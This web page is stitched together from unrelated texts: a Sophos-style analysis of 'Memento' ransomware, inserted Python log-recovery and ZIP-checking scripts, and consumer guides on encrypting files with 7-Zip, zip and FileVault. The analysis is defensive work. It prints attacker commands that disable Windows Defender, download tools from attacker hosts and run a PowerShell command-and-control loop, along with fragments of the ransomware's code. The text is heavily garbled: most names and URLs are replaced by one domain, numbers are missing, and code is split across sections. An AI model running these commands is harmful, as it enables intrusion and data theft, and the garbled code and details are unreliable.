How to Password Protect a Folder or File in Windows | Avast

Username and Password Archives

A Windows login password offers a very basic level of protection that mainly keeps your files safe from others who may share your computer.


 

This miner operator also dropped a copy of the NSSM services helper to monitor and manipulate running services (downloaded from a compromised WordPress site).

XMRig and NSSM were downloaded again on October 3, this time from a GitHub page, using a “support” administrative account created by the miner actors to execute the scripts.

Meanwhile, back at the ransomware

In October, the Memento gang began preparations to launch ransomware. They dropped a copy of the administrative tool Process Hacker onto the server that they used as their primary foothold on October 1, and configured Process Hacker’s kernel driver as a service for persistence.

For the next two weeks, the intruders continued to expand their reach within the network using RDP, occasionally deleting RDP logs to cover their tracks. On October 20, they began to use WinRAR to compress a collection of files for exfiltration, moving the archives to a directory on a shared drive they could access via RDP. They also deployed a Python-based keylogger onto the workstation of the primary system administrator for the organization, along with an installation of a legitimate remote control software product (SOTI’s MobiControl Remote Control), to ensure continued access for RDP sessions.

On October 22, data collection complete, the attackers then used Jetico’s BCWipe data wiping utility to remove evidence of the archived files once they were collected and to modify timestamps on others. They also cleared Terminal Services logs to erase evidence of RDP sessions.

On the evening of October 23 (a Saturday), they executed the first iteration of their ransomware.

The first attempt at the ransomware, shoppingdowntown.us, used WinRAR to archive the files and then attempted to encrypt them. The ransomware, as stated earlier, was an executable compiled from Python —possibly compiled with the Python instance installed on the network by the actors earlier.

Because the code was compiled with PyInstaller and Python , we could not completely decompile the ransomware samples. But we were able to decode enough to understand its structure and identify most of how the ransomware worked. Its main function served only to kick off the “Demon” function imported from a module named “morph”:

 

    from morph import Demon

    def main():
        demon = Demon()
        shoppingdowntown.us(demon)

    if __name__ == '__main__':
        main()

The shoppingdowntown.us module that contains the Demon function also includes a number of global variables used by the ransomware:

    KEYFILE = 'shoppingdowntown.us'
    URL = 'hxxp://78[.]/shoppingdowntown.us'
    START_MSG = 'Task Started.'
    END_MSG = 'Task Completed.'
    CHECK_INTERVAL =
    REPORT_INTERVAL = 25

The shoppingdowntown.us file contains a public key. The URL is a command and control server that receives telemetry from each instance of the ransomware.

The “Demon” class itself executes the various other methods of the ransomware. It generates a unique ID for the system based on its IP address and Windows system name, and launches a “connector” to communicate with the command and control server, the encryption code, and a repeating timer copied straight from Stack Overflow. The connector is used to send system information, including the victim ID, system information, and progress messages as the encryption routine traverses system files.

    class Demon:
        def __init__(self):
            shoppingdowntown.us = createID()   # createID returns string with IP address and hostname, like "targeted-pc"
            shoppingdowntown.us = datetime(, 10, 10, 15, 23)  # this time is the same in all three samples, later replaced with actual time
            shoppingdowntown.us = shoppingdowntown.use('.+', shoppingdowntown.usCASE)
            shoppingdowntown.uss = []
            shoppingdowntown.us_cnt = 0
            shoppingdowntown.us_bytes = 0
            shoppingdowntown.us_enc_cnt = 0
            shoppingdowntown.us_report_cnt = 0
            shoppingdowntown.us_files = []
            shoppingdowntown.ustor = Connector(shoppingdowntown.us, URL)         # Connector class is loaded from shoppingdowntown.us
            shoppingdowntown.usr = Cryptor(KEYFILE)                  # Cryptor, the encryption code, is loaded from shoppingdowntown.us
            shoppingdowntown.us = RepeatTimer(CHECK_INTERVAL, shoppingdowntown.usckCheckTimeUp)  # RepeatTimer is loaded from shoppingdowntown.us
            shoppingdowntown.uscInfo()

The “createID” function, as noted in the comments we added to the code above, generates a unique identifier by creating a socket connection to Google’s DNS service on port 80, and retrieving the local IP address for the connection (with shoppingdowntown.uskname) and the system’s hostname. Those values are concatenated into a single string, which is used by the Memento C2 as a system unique identifier.

The “sendVicInfo” function is exactly what it sounds like: it aggregates system information about the machine being targeted by the ransomware instance to be sent back over the C2 connection to the ransomware actors.

    def sendVicInfo(self):
        ret_str = f'''<=== Start time ===>: {shoppingdowntown.us}\n\n'''
        uname = shoppingdowntown.us()
        ret_str += f'''System: {shoppingdowntown.us}\n'''
        ret_str += f'''Node Name: {shoppingdowntown.us}\n'''
        ret_str += f'''Release: {shoppingdowntown.use}\n'''
        ret_str += f'''Version: {shoppingdowntown.usn}\n'''
        ret_str += f'''Machine: {shoppingdowntown.use}\n'''
        ret_str += f'''Processor: {shoppingdowntown.ussor}\n\n'''
        boot_time_timestamp = shoppingdowntown.us_time()
        bt = shoppingdowntown.usmestamp(boot_time_timestamp)
        ret_str += f'''Boot Time: {shoppingdowntown.us}/{shoppingdowntown.us}/{shoppingdowntown.us} {shoppingdowntown.us}:{shoppingdowntown.us}:{shoppingdowntown.us}\n\n'''
        ret_str += 'Total cores: %s\n' % shoppingdowntown.us_count(True, **('logical',))
        ret_str += f'''Total CPU Usage: {shoppingdowntown.us_percent()}%\n\n'''
        svmem = shoppingdowntown.usl_memory()
        ret_str += f'''Total: {convSize(shoppingdowntown.us)}\n'''
        ret_str += f'''RAM Percentage: {shoppingdowntown.ust}%\n\n'''
        partitions = shoppingdowntown.us_partitions()

 

The cryptor code uses AES to encrypt the files. The public key filename is passed to it as an argument, but it’s not used directly as the key for encryption. Rather, it is used to decrypt the password used in combination with a private key that is delivered from the C2 to decrypt a file called shoppingdowntown.us into a Python resource file. The actual file encryption is AES-based, using cipher block chaining; a password is generated for each file and is RSA encrypted. The shoppingdowntown.us that defines the cryptor has the following imports and variables:

    from shoppingdowntown.usKey import RSA
    from shoppingdowntown.us import PKCS1_OAEP
    from shoppingdowntown.us import AES
    import random
    import string
    import sys
    import os
    import subprocess

    SEED_LEN = 32
    INITIAL_VECTOR = b'\xa4' * shoppingdowntown.us_size
    MAX_READ =
    MAX_READ_PAD = MAX_READ + shoppingdowntown.us_size
    ENC_EXT = 'vaultz'
    SIG_EXT = 'vault-key'
    RAR_EXE = 'shoppingdowntown.us'

 

The “RAR_EXE” variable is a reference to the instance of WinRAR used by the attackers in this first version. It appears to be called by a function called encryptFile_r; a separate encryptFile function is used to encrypt files, while the encryptFile_r then puts them into an archive. While some systems were impacted by this first version of the ransomware, the encryption step was caught on systems with anti-ransomware protection.

Second verse, slightly different than the first

Undeterred, the Memento attackers switched approaches. With their access to the network still intact, they modified the ransomware code; instead of encrypting first, the new code used the WinRAR executable to archive files into a password-protected archive. Two additional variants of the ransomware executable, both compiled as shoppingdowntown.us, were built. Both added a command line argument handler so that parameters could be passed to the Demon class.

shoppingdowntown.us(demon, shoppingdowntown.us[1])

The second of the two added code to check the length of the argument passed from the command line—clearly a debug after the first version failed when no argument was passed.

    from morph import Demon
    import sys

    def main():
        demon = Demon()
        start = ''
        if len(shoppingdowntown.us) > 1:
            start = shoppingdowntown.us[1]
        shoppingdowntown.us(demon, start)

    if __name__ == '__main__':
        main()

The shoppingdowntown.us file also included some minor tweaks, including a reference to a filter file, shoppingdowntown.us:

    KEYFILE = 'shoppingdowntown.us'
    URL = 'hxxp://78[.]/shoppingdowntown.us'
    START_MSG = 'Task Started.'
    END_MSG = 'Task Completed.'
    FILTER_FILE = 'shoppingdowntown.us'
    CHECK_INTERVAL = 3
    REPORT_INTERVAL = 25

The contents of shoppingdowntown.us:

    c:\\Documents and Settings
    c:\\Users\\All Users
    c:\\users\\Default User
    c:\\Programdata\\Application Data
    C:\\ProgramData\\Desktop
    C:\\ProgramData\\Documents
    C:\\ProgramData\\Start Menu"
    C:\\ProgramData\\Templates
    C:\\windows
    shoppingdowntown.us
    Local Setting
    C:\\ System Volume Information

This appears to have specified which paths and specific files not to encrypt.

The modifications to the ransomware changed its behavior to avoid detection of encryption activity. Instead of encrypting files, the “crypt” code now put the files in unencrypted form into archive files, using the copy of WinRAR, saving each file in its own archive with a .vaultz file extension. Passwords were generated for each file as it was archived. Then the passwords themselves were encrypted.

These variants were built and executed hours after the first attempt. The malware was spread manually by the attackers, using RDP and stolen credentials.

 

A ransom note, Hello shoppingdowntown.us, was dropped after the files were archived. The file was dropped manually in the Desktop folder of the primary IT administrator’s workstation. The wording and formatting are nearly identical to REvil gang ransom notes, and threaten data exposure if the ransom payment is not made. Unlike REvil, however, the demand for payment was in Bitcoin, and the Memento actors offered a payment schedule for decryption: BTC (approximately $1 million US) for all files, and varying rates for individual files by type:

Pyrrhic victories

After over 6 months dwell time on the victim’s network, the attack had finally been sprung. Unfortunately for the Memento actors, all that extra work did not pay off as planned. The victim did not negotiate with the ransomware actors.

Thanks to backups, the targeted organization was able to restore most of their data and return to somewhat normal operations. Additionally, for systems that were running InterceptX, the endpoint detection and response system logged the commands used by the attack to archive files—along with the unencrypted passwords for the files. SophosLabs and Sophos Rapid Response were able to recover select files for the victim and provide a method for recovering any files not backed up. 
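The recovery described above depends on process-creation logs that captured each archive command together with its password. The following Python is an added example, not Sophos's tooling: the JSON log format, the `r.exe` stand-in for the renamed WinRAR binary and the `a -hp<password>` command shape are assumptions, and every event is constructed. It builds an archive-to-password map for restoration and flags bursts of password-protected archive creation by argument pattern rather than by binary name.

```python
import json
import re
from collections import Counter

ARCHIVE_EXT = ".vaultz"   # per-file archive extension named in the report
BURST_THRESHOLD = 3       # assumed alert threshold: archives per (host, image)

# Constructed process-creation events, one JSON object per line (not real
# telemetry). "r.exe" stands in for the renamed WinRAR binary; hosts, paths
# and passwords are invented, and the "a -hp<password>" shape is an assumption.
SAMPLE_EVENTS = r'''
{"host": "FS01", "image": "C:\\temp\\r.exe", "cmd": "r.exe a -hpQ7xpLm2 \"D:\\Share\\budget.xlsx.vaultz\" \"D:\\Share\\budget.xlsx\""}
{"host": "FS01", "image": "C:\\temp\\r.exe", "cmd": "r.exe a -hpZk31Twq9 \"D:\\Share\\hr\\staff.docx.vaultz\" \"D:\\Share\\hr\\staff.docx\""}
{"host": "FS01", "image": "C:\\temp\\r.exe", "cmd": "r.exe a -pB8mmR0x D:\\Share\\plan.pdf.vaultz D:\\Share\\plan.pdf"}
{"host": "WS07", "image": "C:\\Program Files\\WinRAR\\Rar.exe", "cmd": "Rar.exe a -hpS3cret D:\\out\\reports.rar D:\\reports"}
{"host": "WS07", "image": "C:\\Program Files\\7-Zip\\7z.exe", "cmd": "7z.exe a D:\\out\\logs.zip D:\\logs"}
{"host": "FS01", "image": "C:\\Windows\\System32\\cmd.exe", "cmd": "cmd.exe /c whoami"}
'''

TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmd):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted or bare for quoted, bare in TOKEN.findall(cmd)]


def parse_archive_cmd(cmd):
    """Return (archive_path, password) for an 'a' (add) command that carries a
    -p/-hp password switch, else None. Keys on arguments, not the image name,
    so a renamed archiver binary is still recognised."""
    args = tokenize(cmd)[1:]
    if not args or args[0].lower() != "a":
        return None
    switches = [a for a in args[1:] if a.startswith("-")]
    positional = [a for a in args[1:] if not a.startswith("-")]
    password = None
    for sw in switches:
        low = sw.lower()
        if low.startswith("-hp") and len(sw) > 3:
            password = sw[3:]            # password follows the switch, case preserved
        elif low.startswith("-p") and len(sw) > 2 and sw[2:] != "-":
            password = sw[2:]
    if password is None or not positional:
        return None
    return positional[0], password


def analyze(lines):
    """Return (recovery_map, alerts) from newline-delimited JSON events."""
    recovery = {}        # (host, archive) -> password; treat as a secret store
    counts = Counter()   # (host, image) -> password-protected archives created
    for line in lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        parsed = parse_archive_cmd(ev["cmd"])
        if parsed is None:
            continue
        archive, password = parsed
        counts[(ev["host"], ev["image"])] += 1
        if archive.lower().endswith(ARCHIVE_EXT):
            recovery[(ev["host"], archive)] = password
    # A production rule would also bound the count by a time window.
    alerts = sorted((h, img, n) for (h, img), n in counts.items()
                    if n >= BURST_THRESHOLD)
    return recovery, alerts


if __name__ == "__main__":
    recovery_map, burst_alerts = analyze(SAMPLE_EVENTS)
    for host, image, n in burst_alerts:
        print(f"ALERT {host}: {image} created {n} password-protected archives")
    # Passwords are deliberately not printed; only the number recovered.
    print(f"{len(recovery_map)} archive passwords recoverable from logs")
```
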

Having effective backups of network data is critical to recovery from a ransomware attack. Unfortunately, the target’s exfiltrated data is still in play. And that could have long-term ramifications for the company.

We believe that the long dwell time by the ransomware actor was in part because they didn’t have ransomware ready to drop at the time of the initial compromise. By keeping a low profile, modifying timestamps on files and wiping logs of telltale signs of compromise, they were able to evade detection for an extremely long time and fully explore the network. The extent to which RDP services were enabled throughout the network made hands-on-keyboard lateral movement throughout the network much easier, further reducing the signature of their intrusion.

The extent to which one unpatched server exposed to the Internet by a misconfigured firewall could be used by multiple malicious actors to exploit the server (and in the case of the ransomware operator, the entire network) offers further emphasis on the urgency of applying vendors’ security patches. At the time of the initial compromise, the vCenter vulnerability had been public for nearly two months, and it remained exploitable up to the day the server was encrypted by the ransomware attackers. Unfortunately, smaller organizations often lack the staff expertise or time required to stay on top of new vulnerability patches outside those automatically deployed by Microsoft. And many organizations are unaware of the degree of risk associated with software platforms they use that may have been installed by a third-party integrator, contract developer or service provider.

A full list of the IOCs for the Memento attack and the miner attacks from this incident is available on SophosLabs’ GitHub page.

SophosLabs would like to acknowledge Vikas Singh, Robert Weiland, Elida Leite, Kyle Link, Ratul Ghosh, Harinder Bhathal, and Sergio Bestuilic of Sophos MTR’s Rapid Response team, and Ferenc László Nagy, Rahul Dugar, Nirav Parekh, and Gabor Szappanos of SophosLabs for their contributions to this report.

 

 

 

 

 

 


New ransomware actor uses password-protected archives to bypass encryption protection

In late October, Sophos MTR’s Rapid Response Team encountered a new ransomware group with an interesting approach to holding victims’ files hostage. The ransomware used by this group, who identify themselves as “Memento Team,” doesn’t encrypt files. Instead, it copies files into password-protected archives, using a renamed freeware version of the legitimate file utility WinRAR—and then encrypts the password and deletes the original files.

This was a retooling by the ransomware actors, who initially attempted to encrypt files directly—but were stopped by endpoint protection. After failing on the first attempt, they changed tactics, and re-deployed, as evidenced by the multiple versions of the ransomware payload compiled at different times found on the victim’s network. They then demanded $1 million US to restore the files, and threatened data exposure if the victim did not comply.

There were some other twists to the “Memento” attack as well. The ransomware itself is a Python script compiled with PyInstaller. And in a ransom note that largely cribs the format used by REvil (including the “[-] What’s Happen [-]” introduction), the criminals behind the ransomware instructed the victims to contact them via a Telegram account. The attackers also deployed an open-source Python-based keylogger on several machines as they moved laterally within the network using Remote Desktop Protocol.

The Memento actors also waited a long time before executing their attack—so long that at least two different cryptocurrency miners were dropped onto the server they used for initial access during the course of their dwell time by different intruders using similar exploits.

Initial compromise

The ransomware actors appear to have taken advantage of a flaw in VMware’s vCenter Server web client first revealed in February. The vulnerability allowed anyone who had TCP/IP port access to the server to execute commands remotely with system-level privileges; a firewall had been misconfigured, and the vCenter Server was exposed to the Internet on that port. This server had outdated malware protection and was not configured with endpoint detection and response.

While there are hints of the actors behind this attack gaining access to the targeted network as early as mid-April, the first real signs of intrusion were on May 4, when PyInstaller-compiled versions of two tools from the Impacket toolset—the wmiexec remote shell tool (which executes commands via Windows Management Instrumentation) and the secretsdump hash dumping tool—were dropped onto a Windows server. The hash dump tool was likely used to acquire credentials for accounts that would be used later.

Six days later, they came back and began further setting up shop, first using a PowerShell command to attempt to turn off malware scanning:

 powershell Set-MpPreference -DisableRealtimeMonitoring $true

Next, the intruders started using PowerShell web requests to pull down files: first, a copy of a command-line version of the WinRAR utility, and then a pair of RAR archives on the compromised server. These commands were executed using the wmiexec remote shell, connecting to a host (now unreachable) in South Korea:

    powershell Invoke-WebRequest -Uri hxxp://[.]/shoppingdowntown.us -OutFile c:\temp\shoppingdowntown.us
    powershell Invoke-WebRequest -Uri http://[.] /shoppingdowntown.us -OutFile c:\temp\shoppingdowntown.us
    powershell Invoke-WebRequest -Uri hxxp://[.]/shoppingdowntown.us -OutFile c:\temp\shoppingdowntown.us

 

Among the files then extracted from the RAR archive were:

  • shoppingdowntown.us—a copy of the Plink SSH tunneling tool, allowing them to gain an interactive console connection with the compromised server.
  • shoppingdowntown.us—NMAP, the network scanning tool.
  • Npcapexe—the installer for the NPCAP network packet capture library and its associated kernel driver.
  • shoppingdowntown.us—Mimikatz, the credential stealing tool.

The actors used Plink to connect via SSH from another South Korean IP address (27[.]). Next, they set up a batch file (shoppingdowntown.us) as a scheduled task (named Windows Defender Metadata Monitor) to establish persistence—pulling commands from a PHP script running on the compromised web server of a publisher in South Korea (novelupdate[.]com) using PowerShell’s Invoke-RestMethod. The script used a nearly identical call to another domain (checkvisa[.]xyz).

Next, the intruders used administrative credentials they had gained to connect to the server via Remote Desktop Protocol, tunneling over the SSH connection. They installed another reconnaissance tool—Advanced Port Scanner—as well as the Python runtime environment. They also dropped two disk utilities—WizTree and DiskSavvy. And they gradually moved laterally, using Mimikatz and secretsdump to compromise three accounts and create two new ones with a compromised “admin” account.

On September 28, someone (most likely the ransomware actors) dropped another copy of the Plink SSH connection, using the transfer[.]sh file transfer service. They used this additional Plink instance to create a reverse shell connection to the account “dontstarve” at a host named google[.]onedriver-srv[.]ml. This copy of Plink was dropped with the file name shoppingdowntown.us, and the configuration of the SSH connection was invoked with a shoppingdowntown.us  Once the reverse shell was set up, the attackers scheduled a task named “GoogleChangeManagementSchedule”—a PowerShell encoded command that uploaded data about the IP address of the compromised server, and then performed some automated exchanges of data that appear to have been related to reconnaissance:

    $c = ""
    $p=""
    $r = ""
    $u = "hxxp://google[.]onedriver-srv[.]ml/gadfTs55sghsSSS"
    $wc = New-Object shoppingdowntown.usent
    $li = (Get-NetIPAddress -AddressFamily IPv4).IPAddress[0]
    $Response = Invoke-WebRequest -Uri hxxp://curlmyip[.]net -UseBasicParsing
    $c = "whoami"
    $c = 'Write-Host " ";'+$c
    $r = &(gcm *ke-e*) $c

7-Zip is an open source software used to compress or zip files secured with encryption.

When you send or transfer files that contain Personally Identifiable Information (PII) or other confidential and sensitive data, the files must be encrypted to ensure they are protected from unauthorized disclosure.

7-Zip, like WinZip, creates a container called an archive that holds the files to be protected. That archive can be encrypted and protected with a password. 7-Zip is free software that creates Zip files that can be opened with WinZip or other similar programs.

To obtain a copy of 7-Zip, please see shoppingdowntown.us and select the appropriate Download link.

Once the software is installed, please follow these steps to encrypt a file or folder.

Step 1: Right click on the file / folder to be encrypted.

Step 2: Select “7-Zip” then “Add to archive…”


Step 3: In the Add to Archive window change the name of the archive you wish to create.


Step 4: Change the Archive format to “Zip”.


Step 5: Change the Encryption Method to “AES”.

There is a trade-off between using AES and ZipCrypto. AES is proven much more secure than ZipCrypto, but if you select AES the recipient of the zip file may have to install 7-Zip or another zip program to read the file contents. Selecting ZipCrypto may allow users to open the zip file in Windows without a zip program, but it does not provide adequate protection against attackers with modern cracking tools.

It is strongly recommended to use AES to protect sensitive and confidential data.


Step 6: Enter a Password. Use a strong password with at least 8 characters containing upper and lowercase letters, and a minimum of one number.


Step 7: Select “Ok” to create the encrypted archive file. The new archive file will be located in the same folder as the original.

**IMPORTANT** - Do not share a password via email. Passwords must be shared out of band, meaning that you send the file and the password by different communication channels: one on the internet, and one not. The best way is to call the recipient of the Zip file and convey the password over the phone.
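To confirm that the Step 5 choice took effect before an archive is sent, the following added Python check (not part of the original instructions) reads a ZIP file's central directory and reports whether each entry is unencrypted, ZipCrypto or AES. The sample archive bytes and file names are constructed, and ZIP64 archives are not handled.

```python
import struct

EOCD_SIG = b"PK\x05\x06"             # end-of-central-directory record
CDH_SIG = b"PK\x01\x02"              # central directory file header
CDH = struct.Struct("<4s6H3L5H2L")   # 46-byte fixed part of a central header
EOCD = struct.Struct("<4s4H2LH")     # 22-byte fixed part of the EOCD record
AES_EXTRA_ID = 0x9901                # WinZip AES extra field
AES_METHOD = 99                      # "compression method" marking AES entries
AES_BITS = {1: 128, 2: 192, 3: 256}


def _aes_strength(extra):
    """Walk the extra-field records and return the AES key size in bits, or None."""
    pos = 0
    while pos + 4 <= len(extra):
        field_id, size = struct.unpack_from("<HH", extra, pos)
        body = extra[pos + 4:pos + 4 + size]
        if field_id == AES_EXTRA_ID and len(body) >= 7:
            return AES_BITS.get(body[4])   # byte 4 of the body is the strength code
        pos += 4 + size
    return None


def classify_entries(data):
    """Map each entry name to 'none', 'ZipCrypto', 'AES-<bits>' or 'other'."""
    end = data.rfind(EOCD_SIG)
    if end < 0 or end + EOCD.size > len(data):
        raise ValueError("no end-of-central-directory record")
    _, _, _, _, total, _cd_size, cd_off, _ = EOCD.unpack_from(data, end)
    result, pos = {}, cd_off
    for _ in range(total):
        (sig, _vm, _vn, flags, method, _t, _d, _crc, _cs, _us,
         nlen, xlen, clen, _disk, _ia, _ea, _off) = CDH.unpack_from(data, pos)
        if sig != CDH_SIG:
            raise ValueError("bad central directory header")
        name = data[pos + 46:pos + 46 + nlen].decode("utf-8", "replace")
        extra = data[pos + 46 + nlen:pos + 46 + nlen + xlen]
        if not flags & 0x1:                 # general-purpose bit 0: encrypted
            kind = "none"
        elif method == AES_METHOD:
            bits = _aes_strength(extra)
            kind = f"AES-{bits}" if bits else "other"
        elif flags & 0x40:                  # PKWARE strong encryption
            kind = "other"
        else:
            kind = "ZipCrypto"              # traditional PKWARE encryption
        result[name] = kind
        pos += 46 + nlen + xlen + clen
    return result


def weak_entries(data):
    """Names of entries that are not AES-protected."""
    return sorted(n for n, k in classify_entries(data).items()
                  if not k.startswith("AES-"))


def _cd_entry(name, flags, method, extra=b""):
    """Build one central-directory record (constructed test data)."""
    raw = name.encode()
    return CDH.pack(CDH_SIG, 20, 20, flags, method, 0, 0, 0, 0, 0,
                    len(raw), len(extra), 0, 0, 0, 0, 0) + raw + extra


def build_sample():
    """Constructed central-directory-only skeleton, one entry per protection type."""
    aes256 = struct.pack("<HHH2sBH", AES_EXTRA_ID, 7, 2, b"AE", 3, 8)
    cd = (_cd_entry("readme.txt", 0x0, 8)
          + _cd_entry("legacy.csv", 0x1, 8)
          + _cd_entry("payroll.xlsx", 0x1, AES_METHOD, aes256))
    return cd + EOCD.pack(EOCD_SIG, 0, 0, 3, 3, len(cd), 0, 0)


if __name__ == "__main__":
    for entry, kind in classify_entries(build_sample()).items():
        print(f"{entry}: {kind}")
```

For a real archive, pass the file's bytes to `classify_entries` and hold the send if `weak_entries` returns any name.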


Imagine you’re staring at a file or folder—perhaps confidential employee information that you need to send to your accountant. If attaching it to an email message makes you think, “That doesn’t seem like a good idea,” award yourself a gold star!

Sending sensitive files via email is a bad idea, partly because the email could be intercepted in transit (possible but highly unlikely), but more because the files then live in both your and your recipient’s email accounts in an unprotected form. If an attacker were to gain access to either of your email accounts, they might scan for patterns like credit card numbers, ID numbers, phone numbers, and postal addresses and find them even in attachments.

There are ways of encrypting email messages so they can be read only by the recipient and never exist in an unencrypted form other than while being created or read, but they’re difficult to set up and fussy to use. For most people, most of the time, encrypted email is overkill.

For a more straightforward solution to exchanging information securely via email, use password-protected and encrypted ZIP archives. They’re easy to create on the Mac, either using a simple command in Terminal or with a third-party utility. And better yet, any Mac user can expand them using the built-in Archive Utility simply by double-clicking and entering the necessary password.

Create Encrypted ZIP Archive Using Terminal

Although many Mac users are intimidated by using the Unix command line in Terminal, making an encrypted ZIP archive is easy enough for anyone. All it takes is typing a single command, dragging a file or folder to Terminal, and entering a password twice. Follow these steps, which make an encrypted ZIP archive on your Desktop:

  1. In your Applications folder, open the Utilities folder and double-click Terminal to launch it.
  2. Type (or copy and paste) this command, replacing “archiveName” with whatever you want to name the ZIP file and making sure to type a space after the last letter—the “p” in “zip”. (The tilde ~ character is Shift-backtick, and it’s the key to the left of the numeral 1 key.)

         zip -er ~/Desktop/shoppingdowntown.us

  3. Drag the file or folder you want to protect into the Terminal window to complete the command.
  4. Press Return, and when prompted, enter the desired password twice—the second time is for confirmation.

Create Encrypted ZIP Archive Using Archiver

If you have trouble with the command-line method or plan to create encrypted ZIP archives regularly, it’s worth using a Mac app that simplifies the process even more. There are various apps, but a particularly straightforward one for those running macOS 11 Big Sur is Archiver ($, with a free trial). Download it and then follow these steps to create an encrypted ZIP archive:

  1. Launch Archiver.
  2. Drag a file or folder to the Archiver window and click the Archive button in the toolbar.
  3. Select the archive format (use ZIP), click the Encrypt checkbox, enter the password twice, and click the Archive button in the toolbar.
  4. Drag the ZIP archive to the Desktop or another folder and click the Done button.

Decrypting a ZIP Archive

As noted earlier, decrypting a password-protected ZIP archive on the Mac is as simple as double-clicking it and entering the password when prompted.


What about iOS or iPadOS? Never fear, since the Files app can also decrypt ZIP archives; just tap the archive to open it and enter the password when prompted.


A Word about Passwords

It’s important to think briefly about how you’re going to communicate the password to your recipient. Don’t send it in email or else anyone who compromises either your email account or your recipient’s account could decrypt the ZIP archive.

Instead, use what’s called an “out of band” communication channel. In other words, if you’re going to send the ZIP archive via email, communicate the password in a phone call or text message. That would keep the password safe if either of your email accounts were compromised.

If you’re sending password-protected ZIP archives to a particular person regularly (and the files don’t contain state or corporate secrets), you could agree on a system for generating passwords so you don’t have to communicate each one individually. For instance, you could combine a random word and the current month, so the password would be “cheddar9September” one month and “cheddar10October” the next.

As you can see, you can use this technique with so little extra effort that it’s worth ensuring a higher level of security whenever you need to share confidential information.

    Out-String > "$env:tmp\$($shoppingdowntown.us())-$($li)"
    $ur = $shoppingdowntown.usFile("$u/shoppingdowntown.us" , "$env:tmp\$($shoppingdowntown.us())-$($li)")
    while($true) {
        $c = $shoppingdowntown.usadString("$u/$($shoppingdowntown.us())-$($li)/txt")
        $c = 'Write-Host " ";'+$c
        if($c -ne $p) {
            $r = &(gcm *ke-e*) $c

How to Encrypt and Password Protect Files on Your Mac


Posted on April 16th, by Jay Vrijenhoek and Kirk McElhearn

How to Encrypt Files on Mac

To protect your sensitive data, you should use encryption and password protection wherever possible; macOS provides you with a number of ways to implement it. Best of all, you can do this with built-in software and features that are part of macOS.

This article covers five areas where you can encrypt or password protect files:

  1. Encrypt System Data and Your Startup Drive
  2. Encrypt External Drives
  3. Encrypt Documents and Files
  4. Encrypt Backups
  5. Encrypt Files You Send to Others

Encrypt System Data and Your Startup Drive

The best way to prevent unauthorized access to your data is to encrypt your startup drive. But you should also set a password to protect your Mac when the screensaver is active, and you can set a firmware password to prevent someone from starting up your Mac from an external drive.

Using FileVault to Encrypt Your Startup Drive

FileVault, the built-in full-disk encryption feature in macOS, is a robust way to encrypt the contents of your entire startup drive. It is important to use a strong password to secure your user account, because that password not only gives you access to your account, but it also unlocks your drive. A simple password (“,” or “password1,” etc.) is easy to guess and will allow anyone to log in, thus bypassing FileVault protection.

To enable FileVault, follow these steps:

  1. From the Apple menu, choose System Preferences.
  2. Go to the Security & Privacy pane.
  3. Click the FileVault tab.
  4. Click the padlock to make changes, then click Turn On FileVault…

    You will be asked to choose a method to unlock your disk if you ever lose your account password.

    If you choose to use your iCloud account, Apple will store the recovery key for your disk on its servers, and you’ll have to provide questions and answers for three security questions that will unlock the disk.

    The recovery key method is more secure, since if someone gets access to your user data, they may have your Apple ID and its password, but you have to make sure that you can store it safely. If you use a password manager, you can store it there, and you’ll be able to access it from your iPhone or iPad if necessary.

    If you select the iCloud option, you will be prompted to restart your Mac and the encryption process will begin. However, if you select recovery key an additional window will show with that key.

  5. The encryption process will begin, and you can use your Mac as you always would. You probably won’t notice any performance hit as FileVault encrypts your disk, and, depending on the size of your Mac’s drive, this will take from a few hours to overnight. Your Mac has to be plugged in for the encryption process to advance, so if you have a laptop make sure to connect it to power. And encryption only occurs when the Mac is awake.
    In the future, you’ll have to log into your Mac each time you start it up, and each time you wake it from sleep. You can’t use automatic login on a Mac with FileVault.

Activating a Screensaver Password

FileVault protects your data at rest, meaning if the Mac is off, sleeping or you are logged out, a password is required to get access. Once you are logged in the data is accessible to you or anyone else that can sit at your Mac while you’re not looking. To prevent this, you should set a password so when your Mac is asleep, or when a screensaver is active, a password is required to access the Mac. And if you set a password like this, it’s easy to lock your Mac, without even clicking your mouse.

To enable the sleep and screensaver password, follow these steps:

    1. From the Apple menu, choose System Preferences.
    2. Go to the Security & Privacy pane.
    3. Click the General tab.
    4. Click the padlock to make changes, then check the Require password — after sleep or screen saver begins. The dropdown menu offers you options as to how soon the password protection should kick in. It’s best to choose immediately here; that way, you don’t have to worry about how long it takes before your Mac is protected. And if you choose this setting, you can set a hot corner that will activate your screen saver when your mouse pointer reaches a specified corner of your display.

      To do this, go back to the Desktop & Screen Saver pane of System Preferences. Click the Screen Saver tab, then, at the bottom of the window, click the Hot Corners… button.

Hot corner actions occur when you move your cursor into one of the corners of your screen. As you can see below, I have four actions set for the four corners of my display. At the top left is Put Display to Sleep. Since my security settings require a password immediately after the display is asleep, this provides instant protection from prying eyes.

You can also put your Mac to sleep by pressing Option–Command–Media Eject, if you want, but if you leave it running with the screen saver, then operations can continue while you're away from your Mac.

Setting a Firmware Password

To prevent unauthorized users from starting up your Mac from another drive, or from the recovery partition, you can set a firmware password. Once set, when you start your Mac from your normal startup disk, you see the normal login window where you enter your user account password. If you try to start up from another drive, or from macOS Recovery, your Mac pauses startup and displays a lock icon with a password field instead.

However, you can only set a firmware password on an Intel Mac; the new Macs with Apple's own processors do not support this. Apple recommends the use of FileVault to protect your data on these Macs, and, to be honest, if you are using FileVault even on an Intel Mac, you probably don't need a firmware password.

To set a firmware password, follow these steps:

      1. Restart your Mac and hold down Command+R as soon as the screen turns black. Your Mac will now boot from the recovery partition. This may take longer than usual but just keep holding down the keys until you see a progress bar.
      2. When the Mac finishes starting up, you should see the Utilities window.
      3. Select Utilities from the menu bar and then choose Firmware Password Utility.
      4. Click Turn On Firmware Password, enter a password, then click Set Password. Make sure to keep a record of the password, in a password manager on another device, for example.
      5. Quit the Utility, then choose Apple Menu > Restart, to restart your Mac. You'll only be asked for the firmware password if someone is attempting to start your Mac from a drive other than the one selected in the Startup Disk pane of System Preferences. If you want to start up from another drive, without having to enter the firmware password, you can change the startup drive, then click Restart in that preference pane.

Encrypt External Drives

FileVault takes care of your startup drive, but what if you have other drives? You may have one or more external drives that you use to store data or for backups; portable drives that you use to take files to and from work; and even USB thumb drives. You may also have drives that are formatted with two or more partitions, and you can choose to encrypt certain partitions on these drives, if you want. You can encrypt these drives manually to protect their data.

